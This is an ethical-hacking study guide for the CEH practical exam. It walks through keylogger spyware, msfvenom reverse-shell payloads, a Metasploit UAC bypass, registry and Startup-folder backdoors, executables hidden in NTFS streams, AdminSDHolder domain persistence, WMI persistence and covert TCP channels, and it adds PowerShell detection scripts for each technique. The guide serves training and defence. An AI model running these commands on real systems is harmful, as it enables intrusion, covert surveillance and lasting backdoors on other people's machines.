Certified Ethical Hacker (CEH v12 and CEH v13) Practical Guide: Complete Study Resources & Tips
3. Maintain Remote Access and Hide Malicious Activities

Remote code execution techniques are typically used after the initial compromise of a system, to expand access to other systems on the target network.


Last updated 2 months ago


1. User system Monitoring with PowerSpy

PowerSpy is keylogger (user-activity monitoring) software.

2. System Monitoring with Spytech spyagent

3. User System Monitoring and Surveillance using Spyrix

Spyrix facilitates covert remote monitoring of user activity in real time. It provides concealed surveillance via a secure web account, logs keystrokes with a keylogger, and monitors platforms such as Facebook, WhatsApp, Skype and email. It can also capture screenshots, view the screen and webcam feeds live, and record screen and webcam activity continuously.

4. Maintain Persistence by Modifying Registry Run Keys

The registry keys named Run and RunOnce cause programs to run automatically each time a user logs on to the system. The command line stored as a value's data is limited to 260 characters. If attackers discover a Run key (or a service referenced from one) on which they hold full permissions, they can use it for persistence or for privilege escalation.

We need two payloads: the first to gain access to the system, the second, added to the registry, to maintain persistence.

1st payload

msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.1.13 lport=444 -f exe > /home/attacker/Desktop/Test.exe

2nd Payload

msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.1.13 lport=4444 -f exe > /home/attacker/Desktop/registry.exe

Now copy both payloads to the target system using any file transfer method.

Now, on Kali Linux, use the following commands to start a listener:

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 10.10.1.13
set lport 444
exploit

Now run the first payload on the target. You will get the shell.

Type getuid and press Enter to display the current user ID. Next we try to bypass the User Account Control (UAC) setting that is blocking unrestricted access to the machine.

Type background and press Enter to background the current session.

We will bypass Windows UAC via the SilentCleanup task in Windows Task Scheduler; Metasploit ships this as the bypassuac_silentcleanup exploit.

In the terminal window, type use exploit/windows/local/bypassuac_silentcleanup and press Enter. Then type set session 1 and press Enter.

To set the LHOST option, type set LHOST 10.10.1.13 and press Enter. To set the TARGET option, type set TARGET 0 and press Enter (0 is simply the exploit target ID). Type exploit and press Enter to launch the exploit against the Windows 11 machine.

Type getsystem -t 1 and press Enter to elevate privileges, then type getuid and press Enter: the Meterpreter session now runs with SYSTEM privileges. Type shell to start a command shell.

reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v backdoor /t REG_EXPAND_SZ /d "C:\Users\Admin\Downloads\registry.exe"

Once the command succeeds, open another terminal window with root privileges and run msfconsole. In Metasploit, type use exploit/multi/handler and press Enter, then set payload windows/meterpreter/reverse_tcp, set lhost 10.10.1.13 and set lport 4444, pressing Enter after each. Type exploit to start the handler.

Once the PC restarts and the user logs on, the Run key launches registry.exe and we get the shell.

5. Hide files using NTFS ADS Streams

Copy calc.exe from the System32 folder to your test folder, then create a text file:

notepad readme.txt

Type dir to check the size of the file.

Now let's append calc.exe to readme.txt as an alternate data stream:

type calc.exe >readme.txt:calc.exe

The reported size does not change. Now create a link to the hidden stream:

mklink backdoor.exe readme.txt:calc.exe

Opening backdoor.exe runs the calculator hidden in the text file.

List hidden ADS streams:

dir /r
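The defender's counterpart to dir /r is to enumerate streams programmatically and look inside them. The following PowerShell is an added example, not part of the guide: it walks a folder, lists every alternate data stream, and flags streams whose first two bytes are the MZ header of a Windows executable, which is exactly what the calc.exe stream attached to readme.txt above would show. It assumes an NTFS volume and Windows PowerShell 5.1 or PowerShell 7; the folder path C:\test is a placeholder for the test folder used in the walkthrough.

```powershell
# Added example (not from the guide): enumerate alternate data streams under a folder
# and flag streams that begin with an MZ header, i.e. carry an executable.
# Assumes an NTFS volume and Windows PowerShell 5.1 or PowerShell 7.

function Get-StreamHeader {
    # Returns the first two bytes of a named stream as a string ('MZ' for a PE file).
    param([string]$File, [string]$Stream)
    try {
        if ($PSVersionTable.PSVersion.Major -ge 6) {
            $bytes = Get-Content -LiteralPath $File -Stream $Stream -AsByteStream -TotalCount 2 -ErrorAction Stop
        } else {
            $bytes = Get-Content -LiteralPath $File -Stream $Stream -Encoding Byte -TotalCount 2 -ErrorAction Stop
        }
        return -join ($bytes | ForEach-Object { [char]$_ })
    } catch {
        return ''
    }
}

function Find-AlternateDataStreams {
    param([string]$Path = '.', [switch]$IncludeZoneIdentifier)
    Get-ChildItem -LiteralPath $Path -File -Recurse -Force -ErrorAction SilentlyContinue |
    ForEach-Object {
        $file = $_
        # Get-Item -Stream * lists every stream; ':$DATA' is the ordinary file content.
        Get-Item -LiteralPath $file.FullName -Stream * -ErrorAction SilentlyContinue |
        Where-Object { $_.Stream -ne ':$DATA' } |
        Where-Object { $IncludeZoneIdentifier -or $_.Stream -ne 'Zone.Identifier' } |
        ForEach-Object {
            $header = Get-StreamHeader -File $file.FullName -Stream $_.Stream
            [pscustomobject]@{
                File       = $file.FullName
                Stream     = $_.Stream
                Length     = $_.Length
                Executable = ($header -eq 'MZ')
            }
        }
    }
}

# Run over the test folder from the walkthrough (placeholder path). Zone.Identifier,
# the mark-of-the-web stream browsers add to downloads, is skipped unless requested.
Find-AlternateDataStreams -Path 'C:\test' | Format-Table -AutoSize
```

Get-Item -Stream * is the PowerShell equivalent of dir /r; streams are also visible to forensic tools through the MFT, and Sysmon event ID 15 (FileCreateStreamHash) records stream creation with a hash of the content, so the `type calc.exe >readme.txt:calc.exe` step above leaves a log entry on a host running Sysmon.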

Reference: Appending Text File as ADS example

6. Hide data using white space steganography

Conceal messages in ASCII text by appending white space to the ends of lines.

The SNOW tool is used for this; it can add up to 7 spaces interspersed with tabs per line.

Create a text file and then use the following command to hide the message in it:

SNOW.EXE -C -m "Hassan is my name" -p "magic" test.txt test2.txt

-m is the message to hide

-p is the password

test.txt is the original (cover) file

test2.txt is the output file

Opening test2.txt does not show the hidden data. However, if we open the file in Notepad and click Edit > Select All, the trailing spaces become visible.

To see the hidden message, use the following command:

SNOW.EXE -C -p "magic" test2.txt
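The Select All trick above works for one file; at scale a defender wants the same observation automated. The following PowerShell is an added example, not from the guide or from SNOW: it measures trailing whitespace per line and treats several lines ending in interleaved spaces and tabs as the signature worth investigating, since editors leave stray spaces but rarely mixed space/tab runs. It does not reproduce SNOW's encoding; the heuristic is the point. The two files written under $env:TEMP are constructed for the demonstration.

```powershell
# Added example (not from the guide or SNOW): flag text files whose line ends carry
# the kind of space/tab padding that whitespace steganography leaves behind.
# Assumes plain text input; only the heuristic is shown, not SNOW's exact encoding.

function Measure-TrailingWhitespace {
    param([Parameter(Mandatory)][string]$Path)
    $lines = @(Get-Content -LiteralPath $Path)
    $hits  = New-Object System.Collections.Generic.List[object]
    for ($i = 0; $i -lt $lines.Count; $i++) {
        if ($lines[$i] -match '[ \t]+$') {
            $tail = $Matches[0]
            $hits.Add([pscustomobject]@{
                Line     = $i + 1
                Length   = $tail.Length
                MixedTab = ($tail.Contains("`t") -and $tail.Contains(' '))
            })
        }
    }
    $trailingBytes = 0
    foreach ($h in $hits) { $trailingBytes += $h.Length }
    $mixed = @($hits | Where-Object MixedTab).Count
    [pscustomobject]@{
        File                = $Path
        Lines               = $lines.Count
        LinesWithTrailingWs = $hits.Count
        TrailingBytes       = $trailingBytes
        MixedSpaceTabLines  = $mixed
        # Editors leave stray spaces; interleaved spaces and tabs on several lines
        # is the pattern that deserves a closer look.
        Suspicious          = ($mixed -ge 3)
    }
}

# Constructed demonstration files: clean cover text, then the same text padded with
# interleaved spaces and tabs, standing in for the output of SNOW.
$cover = "The quick brown fox`r`njumps over`r`nthe lazy dog`r`nand goes home."
$cover | Set-Content -LiteralPath "$env:TEMP\cover.txt" -NoNewline
$padded = ($cover -split "`r`n" | ForEach-Object { $_ + " `t  `t " }) -join "`r`n"
$padded | Set-Content -LiteralPath "$env:TEMP\padded.txt" -NoNewline

Measure-TrailingWhitespace "$env:TEMP\cover.txt"
Measure-TrailingWhitespace "$env:TEMP\padded.txt"
```

The clean cover file has no trailing whitespace at all, while the padded copy has four lines ending in a mixed space/tab run and crosses the threshold. Files that tab-indent code or end lines with a single space will not trip it, which is what keeps the check usable on a real document share.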

7. Image Steganography using OpenStego and Stegonline

OpenStego

Select the message file and the cover file in which to hide the data, then click Hide.

A new file is created. It opens as an image but also contains our message. Extraction is done the same way from the tool.

Stegonline

Upload the file, then choose the settings and remember them; the same settings are needed for extraction.

Similarly, the data can be extracted from the image.

8. Maintain persistence abusing boot or Logon autostart

After getting an admin Meterpreter session on the remote machine, change to the Startup folder:

cd "C:\\ProgramData\\Start Menu\\Programs\\StartUp"

Check the working directory with pwd.

Now upload your msfvenom payload here.
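Sections 4 and 8 use the two classic logon autostart locations, the Run/RunOnce keys and the Startup folders, so one host audit covers both. The following PowerShell is an added example, not part of the guide or of Metasploit: it enumerates those locations, resolves each entry to the executable it launches, and flags entries whose image is outside Program Files or the Windows directory, is missing, or lacks a valid Authenticode signature. Both the Downloads-resident registry.exe added above and an unsigned payload dropped into Startup match. It assumes an elevated PowerShell on the Windows host under review.

```powershell
# Added example (not from the guide): audit autostart entries in the Run/RunOnce keys
# and in the per-user and all-users Startup folders.
# Assumes: elevated PowerShell on the Windows host under review.

$runKeys = @(
    'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run',
    'HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce',
    'HKLM:\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run',
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run',
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\RunOnce'
)

$startupFolders = @(
    [Environment]::GetFolderPath('Startup'),        # current user
    [Environment]::GetFolderPath('CommonStartup')   # all users (under ProgramData)
)

# Roots from which legitimate autostart binaries are normally launched.
$trustedRoots = @($env:ProgramFiles, ${env:ProgramFiles(x86)}, $env:SystemRoot) | Where-Object { $_ }

function Get-ImagePath {
    # Expand %VAR% references (REG_EXPAND_SZ) and isolate the executable from its arguments.
    # A bare name such as rundll32.exe comes back without a directory and is flagged for review.
    param([string]$CommandLine)
    $expanded = [Environment]::ExpandEnvironmentVariables($CommandLine)
    if ($expanded -match '^\s*"([^"]+)"') { return $Matches[1] }
    return ($expanded -split '\s+', 2)[0]
}

function Test-AutostartImage {
    # One report row per entry; Suspicious is true when the image lies outside the
    # trusted roots, does not exist, or is not validly signed.
    param([string]$Source, [string]$Name, [string]$Command)
    $path = Get-ImagePath $Command
    $inTrusted = $false
    foreach ($root in $trustedRoots) {
        if ($path -like ($root.TrimEnd('\') + '\*')) { $inTrusted = $true }
    }
    $sig = if ($path -and (Test-Path -LiteralPath $path -PathType Leaf)) {
        (Get-AuthenticodeSignature -FilePath $path).Status.ToString()
    } else { 'FileMissing' }
    [pscustomobject]@{
        Source     = $Source
        Name       = $Name
        Image      = $path
        Signature  = $sig
        Suspicious = (-not $inTrusted) -or ($sig -ne 'Valid')
    }
}

function Get-AutostartReport {
    foreach ($key in $runKeys) {
        if (-not (Test-Path $key)) { continue }
        $item = Get-Item -LiteralPath $key
        foreach ($valueName in $item.GetValueNames()) {
            # Read the stored data unexpanded so the report shows what the key actually holds.
            $raw = $item.GetValue($valueName, '', 'DoNotExpandEnvironmentNames')
            Test-AutostartImage -Source $key -Name $valueName -Command $raw
        }
    }
    foreach ($folder in $startupFolders) {
        if (-not (Test-Path $folder)) { continue }
        foreach ($f in Get-ChildItem -LiteralPath $folder -File -Force) {
            # A shortcut in Startup is resolved to the file it launches.
            $target = $f.FullName
            if ($f.Extension -eq '.lnk') {
                $target = (New-Object -ComObject WScript.Shell).CreateShortcut($f.FullName).TargetPath
            }
            Test-AutostartImage -Source $folder -Name $f.Name -Command "`"$target`""
        }
    }
}

Get-AutostartReport | Where-Object Suspicious | Format-Table -AutoSize
```

HKCU: only covers the account running the script; for a whole-machine review, load each profile's NTUSER.DAT hive (or iterate HKU:) and repeat the Run/RunOnce checks. Compare the output against a known-good baseline rather than reviewing it cold, and treat any change to these keys by a non-installer process as an event worth alerting on.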


9. Maintain Domain Persistence exploiting Active Directory Objects

AdminSDHolder is an Active Directory container whose default security permissions are used as a template for protected AD accounts and groups, such as Domain Admins and Enterprise Admins, to protect them from unintentional modification of their permissions.

If a user account is added to the access control list of AdminSDHolder, the user acquires "GenericAll" permissions over those protected objects, which is equivalent to being a domain administrator.

After gaining the Meterpreter session, upload PowerTools (master):

upload -r /home/attacker/Power-Tools-Master C:\\users\\Administrator\\Downloads

Now enter the shell and start PowerShell:

shell
powershell

Now change directory to the PowerTools folder and use the following commands to add the user Martin to the ACL:

Import-Module ./powerview.psm1
Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=system' -PrincipalSamAccountName Martin -Verbose -Rights All

To check the permissions, use the following command:

Get-ObjectAcl -SamAccountName "Martin" -ResolveGUIDs

Now, to add the user to the admin group, use the following command:

net group "Domain Admins" Martin /add /domain

From PowerShell, we can use the following command to check the persistence:

dir \\192.168.10.18\C$
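The ACE added above is what a domain audit should catch, and because SDProp stamps the AdminSDHolder descriptor onto every protected object about once an hour, the same foreign ACE soon appears on Domain Admins and the other protected groups as well. The following PowerShell is an added example, not from the guide or from PowerView: it reads AdminSDHolder and every object with adminCount=1 through the ActiveDirectory module's AD: drive and reports any ACE whose trustee is an individual user account. By default those descriptors carry ACEs only for built-in principals and groups, so a user such as Martin standing there is a finding. It assumes the RSAT ActiveDirectory module and read access to the domain.

```powershell
# Added example (not from the guide or PowerView): report ACEs on AdminSDHolder and on
# protected objects whose trustee is a plain user account.
# Assumes the RSAT ActiveDirectory module and read access to the domain.

function Get-UserAcesOnObject {
    param([Parameter(Mandatory)][string]$DistinguishedName)
    # The AD: PSDrive exposes directory objects so Get-Acl can read their security descriptors.
    $acl = Get-Acl -Path "AD:\$DistinguishedName"
    foreach ($ace in $acl.Access) {
        $sid = $null
        try {
            $sid = $ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier])
        } catch {
            continue   # unresolvable trustee (deleted account); report separately if desired
        }
        # Well-known SIDs such as SYSTEM or Authenticated Users have no directory object
        # and drop out here; groups are expected and are not reported.
        $obj = Get-ADObject -Filter "objectSid -eq '$($sid.Value)'" -Properties objectClass -ErrorAction SilentlyContinue
        if ($obj -and $obj.ObjectClass -eq 'user') {
            [pscustomobject]@{
                Object    = $DistinguishedName
                Trustee   = $ace.IdentityReference.Value
                Rights    = $ace.ActiveDirectoryRights.ToString()
                Type      = $ace.AccessControlType.ToString()
                Inherited = $ace.IsInherited
            }
        }
    }
}

function Get-AdminSdHolderUserAces {
    Import-Module ActiveDirectory -ErrorAction Stop
    $domainDn = (Get-ADDomain).DistinguishedName
    Get-UserAcesOnObject -DistinguishedName "CN=AdminSDHolder,CN=System,$domainDn"
    # SDProp copies this descriptor to every protected object (adminCount=1) roughly hourly,
    # so the same check on those objects shows where the ACE has already propagated.
    Get-ADObject -LDAPFilter '(adminCount=1)' | ForEach-Object {
        Get-UserAcesOnObject -DistinguishedName $_.DistinguishedName
    }
}

Get-AdminSdHolderUserAces | Format-Table -AutoSize
```

Pair the ACL review with the domain controller's security log: with directory service change auditing enabled, the Add-ObjectAcl step produces event 5136 (directory service object modified) on AdminSDHolder, and the net group "Domain Admins" ... /add step produces event 4728 (member added to a security-enabled global group).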

10. Priv Esc with WMI and maintain persistance

WMI (Windows Management Instrumentation) event subscriptions can be used to install event filters, providers, consumers, and bindings that execute code when a defined event occurs. WMI enables system administrators to perform tasks locally and remotely.

Get a Meterpreter session and upload the WMI-Persistence.ps1 script; have a second msfvenom payload ready as well.

Now, within Meterpreter, load the PowerShell extension:

load powershell
powershell_shell

Now type the following commands to run the script:

Import-Module ./WMI-Persistence.ps1
Install-Persistence -Trigger Startup -Payload "C:\users\administrators\downloads\exploit.exe"

Now listen with multi/handler in msf. Within 5-10 minutes, you will get an admin shell.
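A permanent WMI subscription is three objects in root\subscription: a __EventFilter with a WQL query, an event consumer, and a __FilterToConsumerBinding tying them together; a defender enumerates the bindings and looks at what each consumer runs. The following PowerShell is an added example, not from the guide or from WMI-Persistence.ps1: it joins the three classes and marks bindings whose consumer executes a command line or script, which is how persistence tooling of this kind installs itself. It assumes a Windows host reachable locally or through a CIM session. The default Windows "SCM Event Log" binding uses an NTEventLogEventConsumer and therefore is not marked.

```powershell
# Added example (not from the guide or WMI-Persistence.ps1): enumerate permanent WMI event
# subscriptions and pair each binding with its filter query and consumer payload.
# Assumes a Windows host reachable locally or via a CimSession.

function Get-WmiEventSubscriptions {
    param([Microsoft.Management.Infrastructure.CimSession]$CimSession)
    $common = @{ Namespace = 'root\subscription'; ErrorAction = 'SilentlyContinue' }
    if ($CimSession) { $common.CimSession = $CimSession }

    $filters   = @(Get-CimInstance @common -ClassName __EventFilter)
    # __EventConsumer is abstract; querying it returns every concrete consumer type.
    $consumers = @(Get-CimInstance @common -ClassName __EventConsumer)
    $bindings  = @(Get-CimInstance @common -ClassName __FilterToConsumerBinding)

    foreach ($b in $bindings) {
        # Filter and Consumer are object references; their Name key identifies the linked object.
        $f = $filters   | Where-Object Name -eq $b.Filter.Name   | Select-Object -First 1
        $c = $consumers | Where-Object Name -eq $b.Consumer.Name | Select-Object -First 1
        $consumerType = if ($c) { $c.CimClass.CimClassName } else { 'unknown' }
        # CommandLineEventConsumer runs a command line; ActiveScriptEventConsumer runs script text.
        $payload = if ($c.CommandLineTemplate) { $c.CommandLineTemplate }
                   elseif ($c.ScriptText)      { $c.ScriptText }
                   else                        { '' }
        [pscustomobject]@{
            Binding      = $b.Filter.Name + ' -> ' + $b.Consumer.Name
            Query        = if ($f) { $f.Query } else { 'unknown' }
            ConsumerType = $consumerType
            Payload      = $payload
            ExecutesCode = ($consumerType -in @('CommandLineEventConsumer', 'ActiveScriptEventConsumer'))
        }
    }
}

Get-WmiEventSubscriptions | Where-Object ExecutesCode | Format-List
```

For continuous detection rather than a point-in-time sweep, Sysmon events 19, 20 and 21 (WmiEventFilter, WmiEventConsumer, WmiEventConsumerToFilter activity) and event 5861 in the Microsoft-Windows-WMI-Activity/Operational log record the creation of exactly these objects, including the consumer's command line.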

11. Covert channels using covert_TCP

Networks use access control rules to permit or deny the traffic flowing through them. Tunneling bypasses the access control rules of firewalls, IDS, IPS and web proxies by carrying traffic inside something they allow. Covert channels can be created by inserting data into unused fields of protocol headers; there are many unused or misused fields in TCP and IP over which data can be sent past a firewall. The Covert_TCP program manipulates the TCP/IP headers of packets to send a file one byte at a time from any host to a destination. It can act as a server or as a client and hides the transmitted data inside the IP header. This is useful for bypassing firewalls and for sending data in legitimate-looking packets that carry no payload for sniffers to analyze. A professional ethical hacker or pen tester must understand how covert traffic is carried inside the unused fields of TCP and IP headers.

Sending machine

Download the tool on the sending machine:

wget https://raw.githubusercontent.com/cudeso/security-tools/master/networktools/covert/covert_tcp.c

Now compile it:

sudo apt install gcc
cc -o covert_tcp covert_tcp.c

2nd machine (receiver)

Compile the tool there as well. Then open a tcpdump listener:

sudo su
tcpdump -nvvX port 8888 -i lo   # optional: nothing is captured on lo in this setup

Start the listener:

sudo ./covert_tcp -dest 192.168.18.144 -source 192.168.18.95 -source_port 8888 -dest_port 9999 -server -file /home/user/msg1.txt

Now, from the sending machine, send the message:

sudo ./covert_tcp -dest 192.168.18.144 -source 192.168.18.95 -source_port 9999 -dest_port 8888 -file /home/kali/msg.txt

We will receive the text file in the same folder on the receiving machine (as msg1.txt).
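The sniffer's view is the defender's opening: a channel that carries one byte per packet in a header field leaves that field looking nothing like the counter or random value a normal IP stack produces. The following PowerShell is an added example, not from the guide or from covert_tcp: given the IP Identification values of the packets in one flow, it returns early for a monotonic counter, checks whether one byte of the field stays fixed while the other decodes as printable ASCII, and reports the decoded text when it does. It tests both byte positions so it does not depend on how any particular tool stores the field. The values are assumed to have been extracted from a capture already; the two sample sequences are constructed, not real traffic.

```powershell
# Added example (not from the guide or covert_tcp): decide whether the IP ID values of one
# flow behave like a counter or like one byte of payload per packet.
# Assumes the values were extracted from a capture; sample data below is constructed.

function Get-PrintableRatio {
    param([int[]]$Bytes)
    if ($Bytes.Count -eq 0) { return 0 }
    $printable = @($Bytes | Where-Object { ($_ -ge 0x20 -and $_ -le 0x7E) -or ($_ -in @(9, 10, 13)) }).Count
    return $printable / $Bytes.Count
}

function Test-IpIdCovertChannel {
    param(
        [Parameter(Mandatory)][int[]]$IpIds,   # 16-bit IP ID values, one per packet, in capture order
        [double]$Threshold = 0.9,
        [int]$MinPackets = 8
    )
    $result = [ordered]@{ Packets = $IpIds.Count; Suspicious = $false; Reason = ''; Decoded = '' }
    if ($IpIds.Count -lt $MinPackets) {
        $result.Reason = 'too few packets'
        return [pscustomobject]$result
    }

    # A sequence that steps by a small positive amount is the ordinary per-packet counter.
    $diffs = for ($i = 1; $i -lt $IpIds.Count; $i++) { ($IpIds[$i] - $IpIds[$i - 1]) -band 0xFFFF }
    if (@($diffs | Where-Object { $_ -ge 1 -and $_ -le 16 }).Count -eq $diffs.Count) {
        $result.Reason = 'monotonic counter'
        return [pscustomobject]$result
    }

    $low  = [int[]]($IpIds | ForEach-Object { $_ -band 0xFF })
    $high = [int[]]($IpIds | ForEach-Object { ($_ -shr 8) -band 0xFF })

    # A random generator moves both bytes; a one-byte-per-packet channel leaves the other
    # byte fixed. Check both byte orders so the heuristic is independent of the tool.
    $lowConst  = (@($low  | Sort-Object -Unique).Count -eq 1)
    $highConst = (@($high | Sort-Object -Unique).Count -eq 1)

    if ($highConst -and (Get-PrintableRatio $low) -ge $Threshold) {
        $result.Suspicious = $true
        $result.Reason     = 'printable payload in low byte, high byte fixed'
        $result.Decoded    = -join ($low | ForEach-Object { [char]$_ })
    } elseif ($lowConst -and (Get-PrintableRatio $high) -ge $Threshold) {
        $result.Suspicious = $true
        $result.Reason     = 'printable payload in high byte, low byte fixed'
        $result.Decoded    = -join ($high | ForEach-Object { [char]$_ })
    } else {
        $result.Reason = 'no fixed byte; consistent with random or normal IDs'
    }
    [pscustomobject]$result
}

# Constructed samples (not captured traffic): a host incrementing its IP ID per packet,
# and a flow whose IDs each carry one ASCII byte of a message.
$counterIds = 0x1e00..0x1e13
$covertIds  = [int[]][char[]]'meet at the usual place'

Test-IpIdCovertChannel -IpIds $counterIds
Test-IpIdCovertChannel -IpIds $covertIds
```

To feed it real data, extract the field per flow from a capture, for example with tshark's `-T fields -e ip.id` output filtered to the suspect source and destination; tshark prints the values as hex strings such as 0x1e00, which PowerShell converts with an [int] cast. The same idea applies to the TCP sequence number or acknowledgement number, which the tool's other modes use: look for a field that should vary freely but is changing in only one byte.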

Power Spy Lite (Softonic)
The SNOW Home Page
Basic Image Steganography for Beginners
Spytech SpyAgent Spy Software - Computer Monitoring Software - Internet Recording
Spyrix - Keylogger, Parental Control Software, Employee Monitoring
Windows Master File Table, MFT forensics (CavemenTech - Demystifying Technology)
Free Steganography Software - QuickStego
Covert Communication
OpenStego
StegOnline
steghide (Kali Linux Tools)
WMI-Persistence/WMI-Persistence.ps1 at master · n0pe-sled/WMI-Persistence (GitHub)
Certified Ethical Hacker (CEHv12) Practical hands on Labs (Udemy)
CEH Practical Preparation Course